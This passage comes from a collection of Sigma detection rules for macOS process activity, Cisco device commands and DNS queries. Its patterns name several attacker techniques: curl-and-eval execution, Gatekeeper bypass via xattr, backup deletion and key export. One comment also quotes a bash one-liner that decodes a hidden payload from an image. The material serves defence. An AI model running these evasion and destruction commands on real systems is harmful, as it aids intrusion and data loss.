    "content": "title: System Information Discovery Using System_Profiler\nid: 4809c683-059b-4935-879d-36835986f8cf\nstatus: test\ndescription: |\n    Detects the execution of \"system_profiler\" with specific \"Data Types\" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.\n    This process is primarily used for system information discovery. However, \"system_profiler\" can also be used to determine if virtualization software is being run for defense evasion purposes.\nreferences:\n    - https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html\n    - https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf\n    - https://ss64.com/mac/system_profiler.html\n    - https://objective-see.org/blog/blog_0x62.html\n    - https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/\n    - https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af\nauthor: Stephen Lincoln `@slincoln_aiq` (AttackIQ)\ndate: 2024-01-02\ntags:\n    - attack.discovery\n    - attack.defense-evasion\n    - attack.t1082\n    - attack.t1497.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '/system_profiler'\n        - CommandLine|contains: 'system_profiler'\n    selection_cmd:\n        # Note: This list is based on CTI reporting. Threat actors might use other data types. Please refere to https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af for a full list\n        CommandLine|contains:\n            - 'SPApplicationsDataType'\n            - 'SPHardwareDataType'\n            - 'SPNetworkDataType'\n            - 'SPUSBDataType'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml",
    "content": "title: System Shutdown/Reboot - MacOs\nid: 40b1fbe2-18ea-4ee7-be47-0294285811de\nstatus: test\ndescription: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md\nauthor: 'Igor Fits, Mikhail Larin, oscd.community'\ndate: 2020-10-19\nmodified: 2022-11-26\ntags:\n    - attack.impact\n    - attack.t1529\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/shutdown'\n            - '/reboot'\n            - '/halt'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: informational\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_tail_base64_decode_from_image.yml",
    "content": "title: Potential Base64 Decoded From Images\nid: 09a910bf-f71f-4737-9c40-88880ba5913d\nstatus: test\ndescription: |\n    Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.\nreferences:\n    - https://www.virustotal.com/gui/file/16bafdf741e7a13137c489f3c8db1334f171c7cb13b62617d691b0a64783cc48/behavior\n    - https://www.virustotal.com/gui/file/483fafc64a2b84197e1ef6a3f51e443f84dc5742602e08b9e8ec6ad690b34ed0/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-12-20\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    # Example:  /bin/bash sh -c tail -c +21453 '/Volumes/Installer/Installer.app/Contents/Resources/workout-logo.jpeg' | base64 --decode > /tmp/54A0A2CD-FAD1-4D4D-AAF5-5266F6344ABE.zip\n    # VT Query: 'behavior_processes:\"tail\" (behavior_processes:\"jpeg\" or behavior_processes:\"jpg\" or behavior_processes:\"png\" or behavior_processes:\"gif\") behavior_processes:\"base64\" behavior_processes:\"--decode >\" and tag:dmg'\n    selection_image:\n        Image|endswith: '/bash'\n    selection_view:\n        CommandLine|contains|all:\n            - 'tail'\n            - '-c'\n    selection_b64:\n        CommandLine|contains|all:\n            - 'base64'\n            - '-d' # Also covers \"--decode\"\n            - '>'\n    selection_files:\n        CommandLine|contains:\n            - '.avif'\n            - '.gif'\n            - '.jfif'\n            - '.jpeg'\n            - '.jpg'\n            - '.pjp'\n            - '.pjpeg'\n            - '.png'\n            - '.svg'\n            - '.webp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml",
    "content": "title: Time Machine Backup Deletion Attempt Via Tmutil - MacOS\nid: 452df256-da78-427a-866f-49fa04417d74\nstatus: test\ndescription: |\n    Detects deletion attempts of MacOS Time Machine backups via the native backup utility \"tmutil\".\n    An adversary may perform this action before launching a ransonware attack to prevent the victim from restoring their files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine\n    - https://www.loobins.io/binaries/tmutil/\nauthor: Pratinav Chandra\ndate: 2024-05-29\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_img:\n        - Image|endswith: '/tmutil'\n        - CommandLine|contains: 'tmutil'\n    selection_cmd:\n        CommandLine|contains: 'delete'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml",
    "content": "title: Time Machine Backup Disabled Via Tmutil - MacOS\nid: 2c95fa8a-8b8d-4787-afce-7117ceb8e3da\nstatus: test\ndescription: |\n    Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility \"tmutil\".\n    An attacker can use this to prevent backups from occurring.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine\n    - https://www.loobins.io/binaries/tmutil/\nauthor: Pratinav Chandra\ndate: 2024-05-29\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_img:\n        - Image|endswith: '/tmutil'\n        - CommandLine|contains: 'tmutil'\n    selection_cmd:\n        CommandLine|contains: 'disable'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml",
    "content": "title: New File Exclusion Added To Time Machine Via Tmutil - MacOS\nid: 9acf45ed-3a26-4062-bf08-56857613eb52\nstatus: test\ndescription: |\n    Detects the addition of a new file or path exclusion to MacOS Time Machine via the \"tmutil\" utility.\n    An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine\n    - https://www.loobins.io/binaries/tmutil/\nauthor: Pratinav Chandra\ndate: 2024-05-29\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_img:\n        - Image|endswith: '/tmutil'\n        - CommandLine|contains: 'tmutil'\n    selection_cmd:\n        CommandLine|contains: 'addexclusion'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml",
    "content": "title: Potential WizardUpdate Malware Infection\nid: f68c4a4f-19ef-4817-952c-50dce331f4b0\nstatus: test\ndescription: Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97\n    - https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset\n    - https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/\nauthor: Tim Rauch (rule), Elastic (idea)\ndate: 2022-10-17\ntags:\n    - attack.command-and-control\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1:\n        Image|endswith: '/sh'\n        CommandLine|contains|all:\n            - '=$(curl '\n            - 'eval'\n    selection_2:\n        Image|endswith: '/curl'\n        CommandLine|contains: '_intermediate_agent_'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml",
    "content": "title: Gatekeeper Bypass via Xattr\nid: f5141b6d-9f42-41c6-a7bf-2a780678b29b\nstatus: test\ndescription: Detects macOS Gatekeeper bypass via xattr utility\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/1fed40dc7e48f16ed44dcdd9c73b9222a70cca85/atomics/T1553.001/T1553.001.md\n    - https://www.loobins.io/binaries/xattr/\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2024-04-18\ntags:\n    - attack.defense-evasion\n    - attack.t1553.001\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/xattr'\n        CommandLine|contains|all:\n            - '-d'\n            - 'com.apple.quarantine'\n    condition: selection\nfalsepositives:\n    - Legitimate activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml",
    "content": "title: Potential XCSSET Malware Infection\nid: 47d65ac0-c06f-4ba2-a2e3-d263139d0f51\nstatus: test\ndescription: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.\nreferences:\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08\n    - https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset\nauthor: Tim Rauch (rule), Elastic (idea)\ndate: 2022-10-17\ntags:\n    - attack.command-and-control\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_1_curl:\n        ParentImage|endswith: '/bash'\n        Image|endswith: '/curl'\n        CommandLine|contains:\n            - '/sys/log.php'\n            - '/sys/prepod.php'\n            - '/sys/bin/Pods'\n    selection_1_https:\n        CommandLine|contains: 'https://'\n    selection_other_1:\n        ParentImage|endswith: '/bash'\n        Image|endswith: '/osacompile'\n        CommandLine|contains|all:\n            - '/Users/'\n            - '/Library/Group Containers/'\n    selection_other_2:\n        ParentImage|endswith: '/bash'\n        Image|endswith: '/plutil'\n        CommandLine|contains|all:\n            - 'LSUIElement'\n            - '/Users/'\n            - '/Library/Group Containers/'\n    selection_other_3:\n        Image|endswith: '/zip'\n        CommandLine|contains|all:\n            - '-r'\n            - '/Users/'\n            - '/Library/Group Containers/'\n    condition: all of selection_1_* or 1 of selection_other_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_clear_logs.yml",
    "content": "title: Cisco Clear Logs\nid: ceb407f6-8277-439b-951f-e4210e3ed956\nstatus: test\ndescription: Clear command history in network OS which is used for defense evasion\nreferences:\n    - https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html\n    - https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'clear logging'\n        - 'clear archive'\n    condition: keywords\nfalsepositives:\n    - Legitimate administrators may run these commands\nlevel: high\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_collect_data.yml",
    "content": "title: Cisco Collect Data\nid: cd072b25-a418-4f98-8ebc-5093fb38fe1a\nstatus: test\ndescription: Collect pertinent data from the configuration files\nreferences:\n    - https://blog.router-switch.com/2013/11/show-running-config/\n    - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm\n    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html\nauthor: Austin Clark\ndate: 2019-08-11\nmodified: 2023-01-04\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.collection\n    - attack.t1087.001\n    - attack.t1552.001\n    - attack.t1005\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'show running-config'\n        - 'show startup-config'\n        - 'show archive config'\n        - 'more'\n    condition: keywords\nfalsepositives:\n    - Commonly run by administrators\nlevel: low\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_crypto_actions.yml",
    "content": "title: Cisco Crypto Commands\nid: 1f978c6a-4415-47fb-aca5-736a44d7ca3d\nstatus: test\ndescription: Show when private keys are being exported from the device, or when new certificates are installed\nreferences:\n    - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-01-04\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.t1553.004\n    - attack.t1552.004\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'crypto pki export'\n        - 'crypto pki import'\n        - 'crypto pki trustpoint'\n    condition: keywords\nfalsepositives:\n    - Not commonly run by administrators. Also whitelist your known good certificates\nlevel: high\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_disable_logging.yml",
    "content": "title: Cisco Disabling Logging\nid: 9e8f6035-88bf-4a63-96b6-b17c0508257e\nstatus: test\ndescription: Turn off logging locally or remote\nreferences:\n    - https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf\nauthor: Austin Clark\ndate: 2019-08-11\nmodified: 2023-01-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'no logging'\n        - 'no aaa new-model'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_discovery.yml",
    "content": "title: Cisco Discovery\nid: 9705a6a1-6db6-4a16-a987-15b7151e299b\nstatus: test\ndescription: Find information about network devices that is not stored in config files\nreferences:\n    - https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-01-04\ntags:\n    - attack.discovery\n    - attack.t1083\n    - attack.t1201\n    - attack.t1057\n    - attack.t1018\n    - attack.t1082\n    - attack.t1016\n    - attack.t1049\n    - attack.t1033\n    - attack.t1124\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'dir'\n        - 'show arp'\n        - 'show cdp'\n        - 'show clock'\n        - 'show ip interface'\n        - 'show ip route'\n        - 'show ip sockets'\n        - 'show processes'\n        - 'show ssh'\n        - 'show users'\n        - 'show version'\n    condition: keywords\nfalsepositives:\n    - Commonly used by administrators for troubleshooting\nlevel: low\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_dos.yml",
    "content": "title: Cisco Denial of Service\nid: d94a35f0-7a29-45f6-90a0-80df6159967c\nstatus: test\ndescription: Detect a system being shutdown or put into different boot mode\nauthor: Austin Clark\ndate: 2019-08-15\nmodified: 2023-01-04\ntags:\n    - attack.impact\n    - attack.t1495\n    - attack.t1529\n    - attack.t1565.001\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'shutdown'\n        - 'config-register 0x2100'\n        - 'config-register 0x2142'\n    condition: keywords\nfalsepositives:\n    - Legitimate administrators may run these commands, though rarely.\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_file_deletion.yml",
    "content": "title: Cisco File Deletion\nid: 71d65515-c436-43c0-841b-236b1f32c21e\nstatus: test\ndescription: See what files are being deleted from flash file systems\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-01-04\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1070.004\n    - attack.t1561.001\n    - attack.t1561.002\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'erase'\n        - 'delete'\n        - 'format'\n    condition: keywords\nfalsepositives:\n    - Will be used sometimes by admins to clean up local flash space\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_input_capture.yml",
    "content": "title: Cisco Show Commands Input\nid: b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b\nstatus: test\ndescription: See what commands are being input into the device by other people, full credentials can be in the history\nauthor: Austin Clark\ndate: 2019-08-11\nmodified: 2023-01-04\ntags:\n    - attack.credential-access\n    - attack.t1552.003\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'show history'\n        - 'show history all'\n        - 'show logging'\n    condition: keywords\nfalsepositives:\n    - Not commonly run by administrators, especially if remote logging is configured\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_local_accounts.yml",
    "content": "title: Cisco Local Accounts\nid: 6d844f0f-1c18-41af-8f19-33e7654edfc3\nstatus: test\ndescription: Find local accounts being created or modified as well as remote authentication configurations\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-01-04\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1136.001\n    - attack.t1098\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'username'\n        - 'aaa'\n    condition: keywords\nfalsepositives:\n    - When remote authentication is in place, this should not change often\nlevel: high\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_modify_config.yml",
    "content": "title: Cisco Modify Configuration\nid: 671ffc77-50a7-464f-9e3d-9ea2b493b26b\nstatus: test\ndescription: Modifications to a config that will serve an adversary's impacts or persistence\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2025-04-28\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.impact\n    - attack.t1490\n    - attack.t1505\n    - attack.t1565.002\n    - attack.t1053\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'ip http server'\n        - 'ip https server'\n        - 'kron policy-list'\n        - 'kron occurrence'\n        - 'policy-list'\n        - 'access-list'\n        - 'ip access-group'\n        - 'archive maximum'\n        - 'ntp server'\n    condition: keywords\nfalsepositives:\n    - Legitimate administrators may run these commands\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_moving_data.yml",
    "content": "title: Cisco Stage Data\nid: 5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59\nstatus: test\ndescription: Various protocols maybe used to put data on the device for exfil or infil\nauthor: Austin Clark\ndate: 2019-08-12\nmodified: 2023-01-04\ntags:\n    - attack.collection\n    - attack.lateral-movement\n    - attack.command-and-control\n    - attack.exfiltration\n    - attack.t1074\n    - attack.t1105\n    - attack.t1560.001\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'tftp'\n        - 'rcp'\n        - 'puts'\n        - 'copy'\n        - 'configure replace'\n        - 'archive tar'\n    condition: keywords\nfalsepositives:\n    - Generally used to copy configs or IOS images\nlevel: low\n"
  },
  {
    "path": "rules/network/cisco/aaa/cisco_cli_net_sniff.yml",
    "content": "title: Cisco Sniffing\nid: b9e1f193-d236-4451-aaae-2f3d2102120d\nstatus: test\ndescription: Show when a monitor or a span/rspan is setup or modified\nauthor: Austin Clark\ndate: 2019-08-11\nmodified: 2023-01-04\ntags:\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1040\nlogsource:\n    product: cisco\n    service: aaa\ndetection:\n    keywords:\n        - 'monitor capture point'\n        - 'set span'\n        - 'set rspan'\n    condition: keywords\nfalsepositives:\n    - Admins may setup new or modify old spans, or use a monitor for troubleshooting\nlevel: medium\n"
  },
  {
    "path": "rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml",
    "content": "title: Cisco BGP Authentication Failures\nid: 56fa3cd6-f8d6-4520-a8c7-607292971886\nstatus: test\ndescription: Detects BGP failures which may be indicative of brute force attacks to manipulate routing\nreferences:\n    - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf\nauthor: Tim Brown\ndate: 2023-01-09\nmodified: 2023-01-23\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.collection\n    - attack.t1078\n    - attack.t1110\n    - attack.t1557\nlogsource:\n    product: cisco\n    service: bgp\n    definition: 'Requirements: cisco bgp logs need to be enabled and ingested'\ndetection:\n    keywords_bgp_cisco:\n        '|all':\n            - ':179' # Protocol\n            - 'IP-TCP-3-BADAUTH'\n    condition: keywords_bgp_cisco\nfalsepositives:\n    - Unlikely. Except due to misconfigurations\nlevel: low\n"
  },
  {
    "path": "rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml",
    "content": "title: Cisco LDP Authentication Failures\nid: 50e606bf-04ce-4ca7-9d54-3449494bbd4b\nstatus: test\ndescription: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels\nreferences:\n    - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf\nauthor: Tim Brown\ndate: 2023-01-09\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.collection\n    - attack.t1078\n    - attack.t1110\n    - attack.t1557\nlogsource:\n    product: cisco\n    service: ldp\n    definition: 'Requirements: cisco ldp logs need to be enabled and ingested'\ndetection:\n    selection_protocol:\n        - 'LDP'\n    selection_keywords:\n        - 'SOCKET_TCP_PACKET_MD5_AUTHEN_FAIL'\n        - 'TCPMD5AuthenFail'\n    condition: selection_protocol and selection_keywords\nfalsepositives:\n    - Unlikely. Except due to misconfigurations\nlevel: low\n"
  },
  {
    "path": "rules/network/dns/net_dns_external_service_interaction_domains.yml",
    "content": "title: DNS Query to External Service Interaction Domains\nid: aff715fa-4dd5-497a-8db3-910bea555566\nstatus: test\ndescription: |\n    Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE\nreferences:\n    - https://twitter.com/breakersall/status/1533493587828260866\n    - https://www.bitdefender.com/en-us/blog/businessinsights/bitdefender-advisory-critical-unauthenticated-rce-windows-server-update-services-cve-2025-59287\n    - https://github.com/SigmaHQ/sigma/pull/5724#issuecomment-3466382234\nauthor: Florian Roth (Nextron Systems), Matt Kelly (list of domains)\ndate: 2022-06-07\nmodified: 2026-01-24\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.reconnaissance\n    - attack.t1595.002\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query|endswith:\n            - '.burpcollaborator.net' # Portswigger Burpsuite Collaborator\n            - '.canarytokens.com' # Thinkst Canary Canarytokens\n            - '.ceye.io'\n            - '.ddns.1443.eu.org' # dig.pm\n            - '.ddns.bypass.eu.org' # dig.pm\n            - '.ddns.xn--gg8h.eu.org' # dig.pm\n            - '.digimg.store' # dnslog.ink\n            - '.dns.su18.org' # javaweb.org\n            - '.dnshook.site' # webhook.site\n            - '.dnslog.cn'\n            - '.dnslog.ink' # dnslog.ink\n            - '.instances.httpworkbench.com' # httpworkbench.com\n            - '.interact.sh' # Project Discovery Interactsh\n            - '.log.dnslog.pp.ua' # dnslog.org\n            - '.log.dnslog.qzz.io' # dnslog.org\n            - '.log.dnslogs.dpdns.org' # dnslog.org\n            - '.log.javaweb.org' # javaweb.org\n            - '.log.nat.cloudns.ph' # dnslog.org\n            - '.oast.fun' # Project Discovery Interactsh\n            - '.oast.live' # Project Discovery Interactsh\n            - '.oast.me' # Project Discovery Interactsh\n            - '.oast.online' # Project Discovery Interactsh\n            - '.oast.pro' # Project Discovery Interactsh\n            - '.oast.site' # Project Discovery Interactsh\n            - '.oastify.com' # Portswigger Burpsuite Collaborator\n            - '.p8.lol' # javaweb.org\n            - '.requestbin.net'\n    filter_main_polling:\n        query|contains: 'polling.oastify.com'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate security scanning.\nlevel: high\n"
  },
  {
    "path": "rules/network/dns/net_dns_mal_cobaltstrike.yml",
    "content": "title: Cobalt Strike DNS Beaconing\nid: 2975af79-28c4-4d2f-a951-9095f229df29\nstatus: test\ndescription: Detects suspicious DNS queries known from Cobalt Strike beacons\nreferences:\n    - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns\n    - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-05-10\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection1:\n        query|startswith:\n            - 'aaa.stage.'\n            - 'post.1'\n    selection2:\n        query|contains: '.stage.123456.'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml",
    "content": "title: Monero Crypto Coin Mining Pool Lookup\nid: b593fd50-7335-4682-a36c-4edcb68e4641\nstatus: stable\ndescription: Detects suspicious DNS queries to Monero mining pools\nreferences:\n    - https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-10-24\ntags:\n    - attack.impact\n    - attack.t1496\n    - attack.exfiltration\n    - attack.t1567\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query|contains:\n            - 'pool.minexmr.com'\n            - 'fr.minexmr.com'\n            - 'de.minexmr.com'\n            - 'sg.minexmr.com'\n            - 'ca.minexmr.com'\n            - 'us-west.minexmr.com'\n            - 'pool.supportxmr.com'\n            - 'mine.c3pool.com'\n            - 'xmr-eu1.nanopool.org'\n            - 'xmr-eu2.nanopool.org'\n            - 'xmr-us-east1.nanopool.org'\n            - 'xmr-us-west1.nanopool.org'\n            - 'xmr-asia1.nanopool.org'\n            - 'xmr-jp1.nanopool.org'\n            - 'xmr-au1.nanopool.org'\n            - 'xmr.2miners.com'\n            - 'xmr.hashcity.org'\n            - 'xmr.f2pool.com'\n            - 'xmrpool.eu'\n            - 'pool.hashvault.pro'\n    condition: selection\nfalsepositives:\n    - Legitimate crypto coin mining\nlevel: high\n"
  },
  {
    "path": "rules/network/dns/net_dns_susp_b64_queries.yml",
    "content": "title: Suspicious DNS Query with B64 Encoded String\nid: 4153a907-2451-4e4f-a578-c52bb6881432\nstatus: test\ndescription: Detects suspicious DNS queries using base64 encoding\nreferences:\n    - https://github.com/krmaxwell/dns-exfiltration\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-05-10\nmodified: 2022-10-09\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\n    - attack.command-and-control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query|contains: '==.'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/network/dns/net_dns_susp_telegram_api.yml",
    "content": "title: Telegram Bot API Request\nid: c64c5175-5189-431b-a55e-6d9882158251\nstatus: test\ndescription: Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind\nreferences:\n    - https://core.telegram.org/bots/faq\n    - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\n    - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/\n    - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-06-05\nmodified: 2022-10-09\ntags:\n    - attack.command-and-control\n    - attack.t1102.002\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query: 'api.telegram.org'   # Telegram Bot API Request https://core.telegram.org/bots/faq\n    condition: selection\nfalsepositives:\n    - Legitimate use of Telegram bots in the company\nlevel: medium\n"
  },
  {
    "path": "rules/network/dns/net_dns_susp_txt_exec_strings.yml",
    "content": "title: DNS TXT Answer with Possible Execution Strings\nid: 8ae51330-899c-4641-8125-e39f2e07da72\nstatus: test\ndescription: Detects strings used in command execution in DNS TXT Answer\nreferences:\n    - https://twitter.com/stvemillertime/status/1024707932447854592\n    - https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1\nauthor: Markus Neis\ndate: 2018-08-08\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\nlogsource:\n    category: dns\ndetection:\n    selection:\n        record_type: 'TXT'\n        answer|contains:\n            - 'IEX'\n            - 'Invoke-Expression'\n            - 'cmd.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/network/dns/net_dns_wannacry_killswitch_domain.yml",
